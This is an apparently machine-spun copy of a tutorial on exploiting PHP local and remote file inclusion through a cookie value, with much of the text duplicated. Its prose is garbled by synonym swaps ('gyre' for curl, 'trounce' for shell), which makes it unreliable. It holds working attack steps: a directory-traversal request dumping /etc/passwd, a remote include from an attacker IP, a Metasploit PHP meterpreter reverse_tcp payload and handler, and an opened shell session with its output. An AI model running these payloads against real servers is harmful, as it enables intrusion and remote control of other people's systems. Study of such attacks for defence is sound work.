PHP supports the powerfulness to ‘include’ or ‘require’ additional files inside a script. If unsanitized information is passed to such functions, an assaulter may live on able to become remote code execution access to the server. Influenza A virus subtype H5N1 typical include block mightiness human face something similar this:
Now, it’s every bit good possible to dynamically ask or include files based on variables or user input, say for example:
or
The work amongst the $_COOKIE[‘pref_file’] example, is that of class the user controls his ain cookies. In this case, rather than the expected value that mightiness live on ‘username_prefs_123456’ for example, the user tin give the sack railroad train a to a greater extent than malicious value. Ultimately, the spider web server volition too so include this malicious file too execute it every bit a PHP script. This malicious file volition accept the permissions to exercise anything that whatever other server side PHP scripts are able to do, which volition near probable enable the assaulter to make a shell. Let’s human face at unlike ways that the vulnerability tin give the sack live on leveraged.
Let’s telephone band our script ‘test.php’ too let’s exercise a sample valid include file, i.e. config/npn.inc.php for it containing a uncomplicated echo statement. Now running gyre too setting the ‘pref_file’ cookie to incorporate ‘npn’ results inwards the following:
Exactly every bit nosotros expect!
Now, let’s say that nosotros desire to utilisation a Local File Inclusion (LFI) assail to include /etc/passwd instead. We are faced amongst 2 immediate issues. Firstly, “config/” is prepended to the begin of our pref_file cookie too secondly, “.inc.php” is appended to the end. Directory traversal too null bytes to the rescue!
If nosotros overstep a modified gyre request, our assail is successful:
Let’s examine our assail string inwards a piffling flake to a greater extent than detail. What’s directly beingness included is “config/../../../etc/passwd.inc.php”. By traversing the directory tree amongst ‘../’ nosotros tin give the sack seat ourselves three directories back, to the source ‘/’ of the filesystem earlier specifying the file that we’re interested inwards – /etc/passwd. By including a unmarried null byte ‘’, nosotros terminate the string, too thus anything after, i.e. ‘.inc.php’ is discarded past times PHP. Note that this null byte number inside paths was resolved inwards PHP 5.3.4
The minute LFI assail method involves beingness able to upload files to the filesystem. As an assaulter if nosotros tin give the sack detect other agency to become files onto the file organization such every bit through anonymous FTP, icon uploads, profile uploads, fifty-fifty PHP session variables containing arbitrary code, too nosotros tin give the sack teach the application to include these files inwards just the same vogue every bit above.
Now, nosotros come upward on to the to a greater extent than interesting remote file inclusion (RFI) attack. If PHP has ‘URL wrappers’ enabled, too so it’s possible to overstep HTTP links into functions such every bit include, require, fopen, too so on.
Take the sample code:
If nosotros telephone band the script with: gyre http://localhost/test.php -b “pref_file=http://192.168.230.128/malicious”
If the PHP version is non susceptible to the null byte attack, too so every bit seen above, every bit nosotros command our ain webserver, nosotros tin give the sack exercise ‘malicious.inc.php’ which includes the ‘.inc.php’ the application volition append, too merely overstep the string ‘/malicious’ to the application.
This article wouldn’t live on finished without trounce access! We tin give the sack generate our trounce with:
Set metasploit to psyche inwards for connections:
Now trigger the remote application to include our malicious file:
Our gyre asking hangs every bit the script kicks into action:
1 2 3 4 5 6 7 | <?phprequire("config/settings.inc.php");require("lib/db.lib.php");require("lib/parser.lib.php");include("contrib/users/user.contrib.php");die("This is a test");?> |
1 2 3 4 | <?phprequire("config/" . $username . ".inc.php");die("This is a test");?> |
1 2 3 4 | <?phprequire("config/" . $_COOKIE['pref_file'] . ".inc.php");die("This is a test");?> |
Let’s telephone band our script ‘test.php’ too let’s exercise a sample valid include file, i.e. config/npn.inc.php for it containing a uncomplicated echo statement. Now running gyre too setting the ‘pref_file’ cookie to incorporate ‘npn’ results inwards the following:
1 2 3 4 | root@pwn:/var/www# gyre http://localhost/test.php -b "pref_file=npn"This is a seek includeThis is a testroot@pwn:/var/www# |
Now, let’s say that nosotros desire to utilisation a Local File Inclusion (LFI) assail to include /etc/passwd instead. We are faced amongst 2 immediate issues. Firstly, “config/” is prepended to the begin of our pref_file cookie too secondly, “.inc.php” is appended to the end. Directory traversal too null bytes to the rescue!
If nosotros overstep a modified gyre request, our assail is successful:
1 2 3 4 5 6 7 8 9 | root@pwn:/var/www# gyre http://localhost/test.php -b "pref_file=../../../etc/passwd"root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/sh... |
The minute LFI assail method involves beingness able to upload files to the filesystem. As an assaulter if nosotros tin give the sack detect other agency to become files onto the file organization such every bit through anonymous FTP, icon uploads, profile uploads, fifty-fifty PHP session variables containing arbitrary code, too nosotros tin give the sack teach the application to include these files inwards just the same vogue every bit above.
Now, nosotros come upward on to the to a greater extent than interesting remote file inclusion (RFI) attack. If PHP has ‘URL wrappers’ enabled, too so it’s possible to overstep HTTP links into functions such every bit include, require, fopen, too so on.
Take the sample code:
1 2 3 4 | <?phprequire($_COOKIE['pref_file'] . ".inc.php");die("This is a test");?> |
1 2 3 | root@pwn:/var/www# gyre http://localhost/test.php -b "pref_file=http://192.168.230.128/malicious"You just included a malicious file!This is a test |
This article wouldn’t live on finished without trounce access! We tin give the sack generate our trounce with:
1 | msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 R > /var/www/malicious.inc.php |
1 2 3 4 5 6 7 8 9 10 11 | msf > utilisation exploit/multi/handlermsf exploit(handler) > railroad train LHOST 0.0.0.0LHOST => 0.0.0.0msf exploit(handler) > railroad train LPORT 8080LPORT => 8080msf exploit(handler) > railroad train payload php/meterpreter/reverse_tcppayload => php/meterpreter/reverse_tcpmsf exploit(handler) > exploit[*] Started opposite handler on 0.0.0.0:8080[*] Starting the payload handler... |
1 | curl http://localhost/test.php -b "pref_file=http://192.168.230.128/malicious" |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | [*] Sending phase (39195 bytes) to 192.168.230.128[*] Meterpreter session 1 opened (192.168.230.128:8080 -> 192.168.230.128:39890) at 2013-08-10 16:49:44 +0100meterpreter > shellProcess 5960 created.Channel 0 created.whoamiwww-dataiduid=33(www-data) gid=33(www-data) groups=33(www-data)ps PID TTY TIME CMD 5611 ? 00:00:00 apache2 5612 ? 00:00:00 apache2 5613 ? 00:00:00 apache2 5614 ? 00:00:00 apache2 5615 ? 00:00:00 apache2 5911 ? 00:00:00 apache2 5912 ? 00:00:00 apache2 5913 ? 00:00:00 apache2 5960 ? 00:00:00 sh 5970 ? 00:00:00 ps |
